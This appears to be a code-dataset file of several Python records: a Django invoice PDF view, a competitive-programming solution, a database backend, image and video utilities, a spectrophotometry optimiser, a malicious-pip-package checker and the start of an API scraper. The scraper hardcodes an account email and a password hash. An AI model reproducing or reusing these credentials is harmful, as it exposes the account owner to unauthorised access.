currency_code=currency_code,\n from_credit_balance=True,\n user_id=request.user.pk,\n create_todo=invoice.client.billing_settings.create_todo_on_invoice_payment,\n )\n\n return Response({'detail': _('Adding {} {} to invoice'.format(amount, currency_code))},\n status=HTTP_202_ACCEPTED)\n\n @action(detail=True, methods=['GET'])\n def download(self, request, pk):\n invoice = self.get_object()\n invoice_number = str(invoice.display_number).strip()\n invoice_file_name = 'invoice_{}.pdf'.format(invoice_number.replace(' ', '_'))\n response = HttpResponse()\n response['Content-Type'] = 'application/pdf'\n response['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(invoice_file_name)\n pdf_file = BytesIO()\n # Add invoice taxes and total/subtotal\n invoice_totals = [{'name': _('Subtotal ({})').format(invoice.currency), 'value': invoice.subtotal}]\n for tax in invoice.taxes:\n invoice_totals.append({'name': tax.get('name'), 'value': tax.get('amount')})\n invoice_totals.append({'name': _('Total ({})').format(invoice.currency), 'value': invoice.total})\n\n # NOTE(tomo): text on invoice can also be customise using the para tag\n # Ex: invoice_status = '{}'.format(invoice_status)\n # See the reportlab userguide for a full list of tag attributes\n try:\n try:\n customer_invoice_details_getter = import_string(getattr(settings, 'INVOICE_CUSTOMER_DETAILS_GETTER'))\n except ImportError:\n customer_details = None\n else:\n customer_details = customer_invoice_details_getter(invoice)\n invoice_statuses_dict = dict((key, translated) for key, translated in InvoiceStatus.PAYMENT_STATUSES)\n if invoice.is_fiscal:\n invoice_issue_date = invoice.fiscal_date.date() if invoice.fiscal_date else None\n invoice_due_date = invoice.fiscal_due_date.date() if invoice.fiscal_due_date else None\n else:\n invoice_issue_date = invoice.issue_date.date() if invoice.issue_date else None\n invoice_due_date = invoice.due_date.date() if invoice.due_date else None\n\n pdf_invoice(pdf_file=pdf_file,\n invoice_display_number=invoice.name,\n invoice_status=invoice_statuses_dict[invoice.status],\n invoice_issue_date=invoice_issue_date,\n invoice_due_date=invoice_due_date,\n customer_details=customer_details if customer_details else invoice.client.long_name,\n company_details=invoice.client.billing_settings.company_info,\n invoice_items=[{'description': item.description,\n 'quantity': 1,\n 'unit_price': item.amount,\n 'cost': item.amount,\n 'options': [{'quantity': opt.quantity,\n 'unit_price': opt.unit_price,\n 'price': opt.price,\n 'display': opt.display} for opt in item.configurable_options.all()]\n } for item in invoice.items.all()],\n invoice_totals=invoice_totals,\n invoice_currency=invoice.currency.code,\n invoice_lang=request.user.language if request.user.language else 'en')\n except Exception as e:\n LOG.exception(e)\n return Response(status=500, data={'details': 'Unable to download invoice'})\n else:\n response.write(pdf_file.getvalue())\n pdf_file.close()\n return response\n", "repo_name": "pizzhub/backendfleio-test", "sub_path": "project/fleio/billing/invoicing/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 11076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 42, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 42, "usage_type": "name"}, {"api_name": "fleio.billing.models.Invoice", "line_number": 43, "usage_type": "name"}, {"api_name": "fleio.core.drf.EndUserOnly", "line_number": 44, "usage_type": "name"}, {"api_name": "rest_framework.filters.OrderingFilter", "line_number": 45, "usage_type": "attribute"}, {"api_name": "rest_framework.filters", "line_number": 45, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.DjangoFilterBackend", "line_number": 45, "usage_type": "name"}, {"api_name": "fleio.core.filters.CustomFilter", "line_number": 45, "usage_type": "name"}, {"api_name": "rest_framework.filters.SearchFilter", "line_number": 45, "usage_type": "attribute"}, {"api_name": "fleio.billing.models.Invoice.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "fleio.billing.models.Invoice.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "fleio.billing.models.Invoice", "line_number": 52, "usage_type": "name"}, {"api_name": "serializers.InvoiceDetailSerializer", "line_number": 56, "usage_type": "name"}, {"api_name": "serializers.InvoiceBriefSerializer", "line_number": 58, "usage_type": "name"}, {"api_name": "fleio.billing.serializers.AddCreditSerializer", "line_number": 62, "usage_type": "call"}, {"api_name": "fleio.core.models.Client.DoesNotExist", "line_number": 66, "usage_type": "attribute"}, {"api_name": "fleio.core.models.Client", "line_number": 66, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 67, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 67, "usage_type": "call"}, {"api_name": "fleio.billing.models.Invoice.objects.filter", "line_number": 70, "usage_type": "call"}, {"api_name": "fleio.billing.models.Invoice.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "fleio.billing.models.Invoice", "line_number": 70, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 72, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 72, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 73, "usage_type": "call"}, {"api_name": "fleio.billing.models.TaxRule.for_country_and_state", "line_number": 76, "usage_type": "call"}, {"api_name": "fleio.billing.models.TaxRule", "line_number": 76, "usage_type": "name"}, {"api_name": "fleio.billing.utils.cdecimal", "line_number": 83, "usage_type": "call"}, {"api_name": "fleio.billing.utils", "line_number": 83, "usage_type": "name"}, {"api_name": "fleio.billing.invoicing.tasks.invoice_create", "line_number": 87, "usage_type": "call"}, {"api_name": "fleio.billing.invoicing.tasks", "line_number": 87, "usage_type": "name"}, {"api_name": "fleio.billing.settings.BillingItemTypes.credit", "line_number": 90, "usage_type": "attribute"}, {"api_name": "fleio.billing.settings.BillingItemTypes", "line_number": 90, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 97, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 98, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 100, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 60, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 105, "usage_type": "call"}, {"api_name": "fleio.billing.operations.get_invoice_payment_options", "line_number": 105, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 102, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 112, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 112, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_409_CONFLICT", "line_number": 112, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 115, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 115, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_409_CONFLICT", "line_number": 115, "usage_type": "name"}, {"api_name": "fleio.core.models.get_default_currency", "line_number": 117, "usage_type": "call"}, {"api_name": "fleio.billing.models.ClientCredit.DoesNotExist", "line_number": 121, "usage_type": "attribute"}, {"api_name": "fleio.billing.models.ClientCredit", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 127, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 127, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_409_CONFLICT", "line_number": 127, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 134, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 135, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_409_CONFLICT", "line_number": 137, "usage_type": "name"}, {"api_name": "fleio.billing.invoicing.tasks.invoice_add_payment.delay", "line_number": 153, "usage_type": "call"}, {"api_name": "fleio.billing.invoicing.tasks.invoice_add_payment", "line_number": 153, "usage_type": "attribute"}, {"api_name": "fleio.billing.invoicing.tasks", "line_number": 153, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 162, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 162, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_202_ACCEPTED", "line_number": 163, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 107, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 170, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 173, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 175, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 178, "usage_type": "call"}, {"api_name": "django.utils.module_loading.import_string", "line_number": 185, "usage_type": "call"}, {"api_name": "django.conf.settings", "line_number": 185, "usage_type": "argument"}, {"api_name": "fleio.billing.models.invoice.InvoiceStatus.PAYMENT_STATUSES", "line_number": 190, "usage_type": "attribute"}, {"api_name": "fleio.billing.models.invoice.InvoiceStatus", "line_number": 190, "usage_type": "name"}, {"api_name": "fleio.billing.invoicing.pdf.pdf_invoice", "line_number": 198, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 219, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 165, "usage_type": "call"}, {"api_name": "fleio.activitylog.utils.decorators.log_enduser_activity", "line_number": 36, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "72878919528", "text": "# link : https://codeforces.com/problemset/problem/1728/C\n# author : Mohamed Ibrahim\n\n\n\n\nfrom collections import Counter\nfor _ in range(int(input())):\n use=input()\n axe=Counter(input().split())\n axe.subtract(Counter(input().split()))\n ans=0\n for key in list(axe.keys()):\n if len(key) > 1:\n ans += abs(axe[key])\n axe[str(len(key))] += axe[key]\n axe[key] = 0\n print(ans+(sum(axe[key] for key in axe.keys() if axe[key] > 0) * 2) - abs((axe[\"1\"])))\n \n \n \n", "repo_name": "M0hamedIbrahim1/Problem-Solving-Python-", "sub_path": "Data Structure Problems/C. Digital Logarithm.py", "file_name": "C. Digital Logarithm.py", "file_ext": "py", "file_size_in_byte": 520, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.Counter", "line_number": 10, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "2402768565", "text": "\"\"\"\n\n.. module:: django-ewiz.base\n :synopsis: django-ewiz database backend base.\n\n django-ewiz is free software: you can redistribute it and/or modify\n it under the terms of the GNU Lesser Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n django-ewiz is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU Lesser Public License for more details.\n\n You should have received a copy of the GNU Lesser Public License\n along with django-ewiz. If not, see .\n\n.. moduleauthor:: Alex Kavanaugh \n\n\"\"\"\n\nimport logging\n\nfrom djangotoolbox.db.base import (NonrelDatabaseFeatures, NonrelDatabaseOperations, NonrelDatabaseWrapper, NonrelDatabaseClient,\n NonrelDatabaseValidation, NonrelDatabaseIntrospection, NonrelDatabaseCreation)\n\n\nlogging.getLogger(\"django_ewiz\")\n\n\nclass DatabaseOperations(NonrelDatabaseOperations):\n compiler_module = __name__.rsplit('.', 1)[0] + '.compiler'\n\n\nclass DatabaseWrapper(NonrelDatabaseWrapper):\n operators = {\n 'exact': \"= '%s'\",\n 'iexact': \"= '%s'\",\n 'contains': \"LIKE '%%25%s%%25'\",\n 'icontains': \"LIKE '%%25%s%%25'\",\n 'gt': \"> '%s'\",\n 'gte': \">= '%s'\",\n 'lt': \"< '%s'\",\n 'lte': \"<= '%s'\",\n 'startswith': \"LIKE '%s%%25'\",\n 'endswith': \"LIKE '%%25%s'\",\n 'istartswith': \"LIKE '%s%%25'\",\n 'iendswith': \"LIKE '%%25%s'\",\n 'in': \"IN (%s)\",\n 'range': \"BETWEEN AND(%s)\",\n 'year': \"BETWEEN AND(%s)\",\n 'isnull': \"IS NULL\",\n }\n\n def __init__(self, *args, **kwargs):\n super(DatabaseWrapper, self).__init__(*args, **kwargs)\n\n self.server_version = None\n self.features = NonrelDatabaseFeatures(self)\n self.ops = DatabaseOperations(self)\n self.client = NonrelDatabaseClient(self)\n self.creation = NonrelDatabaseCreation(self)\n self.introspection = NonrelDatabaseIntrospection(self)\n self.validation = NonrelDatabaseValidation(self)\n", "repo_name": "kavdev/django-ewiz", "sub_path": "django_ewiz/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 2266, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseOperations", "line_number": 32, "usage_type": "name"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseWrapper", "line_number": 36, "usage_type": "name"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseFeatures", "line_number": 60, "usage_type": "call"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseClient", "line_number": 62, "usage_type": "call"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseCreation", "line_number": 63, "usage_type": "call"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseIntrospection", "line_number": 64, "usage_type": "call"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseValidation", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "37220993279", "text": "from pathlib import Path\n\nimport cv2\n\nif __name__ == \"__main__\":\n \"\"\"\n Convert movie file in jpeg files.\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description=\"jpg2mp4 converter\")\n parser.add_argument(\"movie_file\", help=\"movie file(.mp4, .avi, .webm) to jpgs \")\n args = parser.parse_args()\n\n movie_file = Path(args.movie_file)\n assert movie_file.suffix in (\".mp4\", \".avi\", \".webm\")\n cap = cv2.VideoCapture(str(movie_file))\n\n outdir = Path.home() / f\"{movie_file.stem}\"\n outdir.mkdir(exist_ok=True)\n counter = -1\n while True:\n ret, cvimg = cap.read()\n if cvimg is None:\n break\n counter += 1\n oname = outdir / f\"{movie_file.stem}_{counter:04d}.jpg\"\n cv2.imwrite(str(oname), cvimg)\n print(f\"saved to {outdir}\")\n", "repo_name": "waragai-katsunori/jpg2mp4", "sub_path": "scripts/mp4_tojpg.py", "file_name": "mp4_tojpg.py", "file_ext": "py", "file_size_in_byte": 813, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path.home", "line_number": 18, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 18, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "33184441189", "text": "from PIL import Image, ImageOps\nimport os\nimport cv2\nimport numpy as np\n\n#im_pth = '../test_imgs/skoda2.jpg'\n\n#/Desktop/InteliGate/CLASSIFICATION/VMMR/google_imgs/downloads\ndef resize_black(desired_size, im_pth, overwrite = False, print_oldsize=True):\n im = Image.open(im_pth)\n old_size = im.size # old_size[0] is in (width, height) format\n if print_oldsize:\n print(old_size)\n ratio = float(desired_size)/max(old_size)\n new_size = tuple([int(x*ratio) for x in old_size])\n # use thumbnail() or resize() method to resize the input image\n # thumbnail is a in-place operation\n # im.thumbnail(new_size, Image.ANTIALIAS)\n im = im.resize(new_size, Image.ANTIALIAS)\n # create a new image and paste the resized on it\n new_im = Image.new(\"RGB\", (desired_size, desired_size))\n new_im.paste(im, ((desired_size-new_size[0])//2,\n (desired_size-new_size[1])//2))\n if overwrite:\n new_im.save(im_pth)\n return new_im, im_pth\n\n\n\ndef resize_white(im_pth, width, height, overwrite = False, print_oldsize=True):\n '''\n Resize PIL image keeping ratio and using white background.\n '''\n image_pil = Image.open(im_pth)\n if print_oldsize:\n print(image_pil.size)\n ratio_w = width / image_pil.width\n ratio_h = height / image_pil.height\n if ratio_w < ratio_h:\n # It must be fixed by width\n resize_width = width\n resize_height = round(ratio_w * image_pil.height)\n else:\n # Fixed by height\n resize_width = round(ratio_h * image_pil.width)\n resize_height = height\n image_resize = image_pil.resize((resize_width, resize_height), Image.ANTIALIAS)\n background = Image.new('RGBA', (width, height), (255, 255, 255, 255))\n offset = (round((width - resize_width) / 2), round((height - resize_height) / 2))\n background.paste(image_resize, offset)\n new_im = background.convert('RGB')\n if overwrite:\n new_im.save(im_pth)\n return new_im, im_pth\n\ndef resize_expand_background(im_pth, width, height, overwrite = False, print_oldsize=True):\n '''\n Resize PIL image keeping ratio and using white background.\n '''\n image_pil = Image.open(im_pth)\n if print_oldsize:\n print(image_pil.size)\n ratio_w = width / image_pil.width\n ratio_h = height / image_pil.height\n if ratio_w < ratio_h:\n # It must be fixed by width\n resize_width = width\n resize_height = round(ratio_w * image_pil.height)\n else:\n # Fixed by height\n resize_width = round(ratio_h * image_pil.width)\n resize_height = height\n image_resize = image_pil.resize((resize_width, resize_height), Image.ANTIALIAS)\n #background = Image.new('RGBA', (width, height), (255, 255, 255, 255))\n background = image_pil.resize((width, height))\n offset = (round((width - resize_width) / 2), round((height - resize_height) / 2))\n background.paste(image_resize, offset)\n new_im = background.convert('RGB')\n #figure2 = imshow(new_im)\n if overwrite:\n new_im.save(im_pth)\n return new_im, im_pth\n\ndef color_to_3_channels(img_path, overwrite=False):\n img = cv2.imread(img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img2 = np.zeros_like(img)\n img2[:,:,0] = gray\n img2[:,:,1] = gray\n img2[:,:,2] = gray\n# imshow(img2)\n# print(np.asarray(img2).shape)\n if overwrite:\n cv2.imwrite(img_path, img2)\n return img2, img_path\n\n# if __name__ == \"__main__\":\n# resize('../test_imgs/forg.png', 299, 299, overwrite = True)\n\nif __name__ == \"__main__\":\n if (os.getcwd() == '/home/kalkami/translearn' or os.getcwd() == '/home/kalkami/translearn_cpu'):\n #lhcpgpu1\n TRAIN_DIR = '/data/IntelliGate/kalkami/DATASETS/carsStanford_all/train'\n TEST_DIR = '/data/IntelliGate/kalkami/DATASETS/carsStanford_all/test'\n else:\n #local\n TRAIN_DIR = '/media/kamila/System/Users/Kama/Documents/DATASETS/carsStanford_all_bw/train'\n TEST_DIR = '/media/kamila/System/Users/Kama/Documents/DATASETS/carsStanford_all_bw/test'\n #folder = '../google_imgs/downloads'\n folders = [TRAIN_DIR, TEST_DIR]\n width = 299\n height = 299\n for folder in folders:\n for subfol in os.scandir(folder):\n for img in os.scandir(subfol):\n if os.path.isfile(img):\n print(img.name)\n #new_im, im_pth = resize_expand_background(os.path.abspath(img), width, height, overwrite=True)\n #color_to_3_channels(im_pth, overwrite=True)\n color_to_3_channels(os.path.abspath(img), overwrite=True)\n #resize_to_square(desired_size, os.path.abspath(img), overwrite=True)\n #resize_to_square(desired_size, im_pth)", "repo_name": "kaamka/cars-classification-deep-learning", "sub_path": "data_preprocessing.py", "file_name": "data_preprocessing.py", "file_ext": "py", "file_size_in_byte": 4764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 19, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 19, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 34, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 47, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 47, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 48, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 60, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 60, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 73, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 86, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 94, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 101, "usage_type": "call"}, {"api_name": "os.scandir", "line_number": 114, "usage_type": "call"}, {"api_name": "os.scandir", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}]} +{"seq_id": "35064315409", "text": "import logging\nimport subprocess\n\nlogger = logging.getLogger('logger')\nlogger.setLevel(logging.INFO)\nconsole = logging.StreamHandler()\nlogger.addHandler(console)\n\n\ndef main():\n try:\n pip_list = subprocess.check_output(\n [\"pip\", \"list\", \"--format=freeze\"])\n except Exception as e:\n logger.error(\"%s\", e)\n return\n stdout_lines = pip_list.decode().split(\"\\n\")\n if not stdout_lines:\n logger.error(\"`pip list --format=freeze` output is empty\")\n return\n\n installed_packages = set()\n for line in stdout_lines:\n p = line.split(\"==\")\n if p and p[0].strip():\n installed_packages.add(p[0].strip())\n\n with open('malicious_packages.txt', 'r') as f:\n malicious_packages = set(x.strip() for x in f.read().splitlines())\n detected_packages = installed_packages.intersection(malicious_packages)\n if detected_packages:\n logger.warning(\n \"%d malicious pip package%s from `malicious_packages.txt`\"\n \" detected in `pip list --format=freeze` output\"\n \"\\nThe packages are\\n%s\", len(detected_packages),\n \"s\" if len(detected_packages) > 1 else \"\", sorted(detected_packages))\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "elliotwutingfeng/check-pip", "sub_path": "check.py", "file_name": "check.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 5, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 6, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "23247538154", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nSpectrophotometry program used for our mystery mixture lab in AP Chem.\n\nDesigned to work with CSV exports from Vernier's Graphical Analysis program. Required inputs are\na spectrophotogram for the unknown mystery mixture, pure yellow, pure red, and pure blue, and the \nratio of yellow, red, and blue in the mixture will be output. Input data sets must all have the same \nwavelengths as dependent variables, as the program does not account for possible misalignments.\n\nRun it from the command line as `python spectrophotometry.py data_file.csv`.\n\nDependencies\n------------\n- `Python 3`, written with 3.7.6, but should be compatible with older Python 3 versions.\n- `pandas` library for data analysis\n- `optimize` submodule of the `scipy` library\n- `List` submodule of the `typing` library\n'''\n\nimport sys # system library, used to read in arguments, as this is a command line app\nfrom typing import List # adds gradual typing support for List, IMO this should really be\n# part of the programming language itself, like primitive typing is\nimport pandas as pd # pandas library, allows manipulation of data in a table-like format\n# science library, this subpackage contains the LM-BFGS-B implementation used\nfrom scipy import optimize\n\n# Parse the -h flag, which stands for \"help\"\nif '-h' in sys.argv:\n print('\\n\\033[1;37mspectrophotometry.py by Michael Noguera\\033[0m')\n print('\\n\\tFinds the ratio of the components in a color mixture based on their spectrophotograms, ')\n print('\\tbased on the LM-BFGS-B algorithm for optimizing a multi-variable system.')\n print('\\n\\033[4;37mUsage:\\033[0m')\n print('\\t`python spectrophotometry.py data_file.csv`')\n print('\\n\\tThe csv file should be in the format exported from the Vernier Spectral Analysis app.')\n print('\\n\\033[4;37mOptions:\\033[0m')\n print('\\t-h \\tdisplays this message and exits\\n')\n quit()\n\n# Read the file path provided by the user\nfilepath: str = sys.argv[1]\n\n# Load the file at that location\ndf: pd.DataFrame = pd.read_csv(filepath)\n\n###\n# PARSE CSV DATA\n###\n\n# Rename first wavelength column, this one will be saved\ndf.rename(columns={df.columns[0]: \"Wavelength\"}, inplace=True)\n\n# Delete redundant wavelength columns\ndf.drop(list(df.filter(regex='\\:Wavelength\\(nm\\)')), axis=1, inplace=True)\n\n# Remove all \":Absorbance\" suffixes from column names\ndf.rename(columns=lambda s: s.replace(\n \":Absorbance\", \"\").strip(), inplace=True)\n\n# Try to automatically match columns with their contents\nfor column in df.columns:\n if \"red\" in column.lower():\n df.rename(columns={column: \"Red\"}, inplace=True)\n if \"blue\" in column.lower():\n df.rename(columns={column: \"Blue\"}, inplace=True)\n if \"yellow\" in column.lower():\n df.rename(columns={column: \"Yellow\"}, inplace=True)\n if \"mystery\" in column.lower():\n df.rename(columns={column: \"Experimental\"}, inplace=True)\n\n# Match up missing columns\nfor column in [\"Red\", \"Blue\", \"Yellow\", \"Experimental\"]:\n if not column in df.columns: # a column is missing, make the user match it up\n print(\"These are your solutions. Please match the missing column by entering it's corresponding number.\")\n print('\\n'.join('{}: {}'.format(*k)\n for k in enumerate(df.columns[1:], 1))) # print out columns in a pretty way\n df.rename(\n columns={df.columns[int(input(column+\" = \").strip())]: column}, inplace=True) # rename descriptively based on user input\n print(\"\\n\")\n\n# Put columns in order\ndf = df[[\"Wavelength\", \"Yellow\", \"Red\", \"Blue\", \"Experimental\"]]\n\n# Output table preview to the user\nprint(df.head())\nprint(\"...\")\n\n###\n# Optimization routine\n###\n\n# Adjust for stock concentration being not equal to one unit per volume\nstock_concentration: float = 12.00 # constant for stock solution concentration\ndf[['Yellow', 'Red', 'Blue']] = df[['Yellow', 'Red', 'Blue']].div(\n stock_concentration) # divide all data values by stock sample concentration\n\n# Optimize for best solution\ndef error(yrb: List[float]) -> float:\n ''' Function that calculates the total error for a given concentration combination.\n\n Arguments:\n yrb: List[float] -- A list containing the concentrations of [yellow, red, blue] in that order.\n\n Returns: the total least-squares error for that combination across all included wavelengths.\n '''\n ret: float = 0\n for (index, row) in df.iterrows():\n ret += ((row['Yellow']*yrb[0])+(row['Red']*yrb[1]) +\n (row['Blue']*yrb[2])-row['Experimental'])**2\n return ret\n\nresult: optimize.OptimizeResult = optimize.minimize(\n fun=error, x0=[2, 2, 2], bounds=[(0, 12), (0, 12), (0, 12)], method='L-BFGS-B')\n\n# Output solution to user\nprint(\"\\nSOLUTION FOUND (and pun intended)\")\nprint(\"\\033[1;33m\"+str(round(dict(result.items())['x'][0], 3)) +\n \"\\033[0;33m\\tparts yellow\\033[0m\")\nprint(\"\\033[1;31m\"+str(round(dict(result.items())['x'][1], 3)) +\n \"\\033[0;31m\\tparts red\\033[0m\")\nprint(\"\\033[1;34m\"+str(round(dict(result.items())['x'][2], 3)) +\n \"\\033[0;34m\\tparts blue\\033[0m\")\nprint(\"error of \"+str(round(dict(result.items())['fun'], 3)))\n", "repo_name": "michaelnoguera/spectrophotometry", "sub_path": "spectrophotometry.py", "file_name": "spectrophotometry.py", "file_ext": "py", "file_size_in_byte": 5172, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 98, "usage_type": "name"}, {"api_name": "scipy.optimize.OptimizeResult", "line_number": 112, "usage_type": "attribute"}, {"api_name": "scipy.optimize", "line_number": 112, "usage_type": "name"}, {"api_name": "scipy.optimize.minimize", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "10158622187", "text": "import requests\nimport json\nimport xlwt\n\n\nURL = \"https://api.brain.com.ua/\" # Константа домена сайта\n\n\ndef get_key():\n \"\"\"Функция получает ключ сессии\"\"\"\n\n url = \"https://api.brain.com.ua/auth\"\n req = requests.post(url, data={\"login\": \"casy@zest.com.ua\",\n 'password':\n \"b6f19093a07cdf6e2fe098d7aee90b2f\"})\n diction = json.loads(req.content)\n return diction[\"result\"]\n\n\ndef get_categories(SID):\n req = requests.get(URL+\"/categories/\"+SID)\n dict_of_categories = json.loads(req.content)[\"result\"]\n return dict_of_categories\n\n\ndef get_IDs_by_pricelist(json_file=None):\n if json_file is None:\n # TODO Путь сделать относительным!\n with open(\"Z:/Repositories/testrepo1/Work/1/get1.json\",\n \"r\",\n encoding=\"UTF-8\") as file:\n json_file = json.load(file)\n list_of_IDs = []\n for prop in json_file.keys():\n list_of_IDs.append(prop)\n return list_of_IDs\n\n\ndef get_props(ID, SID):\n req = requests.get(URL + \"/product/\" + str(ID) + \"/\" + SID)\n props = json.loads(req.content)\n return props[\"result\"]\n\n\ndef good_view(props):\n dict_good_props = {}\n rules = {\n \"productID\": \"ID\",\n \"name\": \"Название\",\n \"articul\": \"Артикул\",\n \"product_code\": \"Код товара\",\n \"price\": \"Цена\",\n \"brief_description\": \"Короткое описание\",\n \"description\": \"Описание\",\n \"warranty\": \"Гарантия, 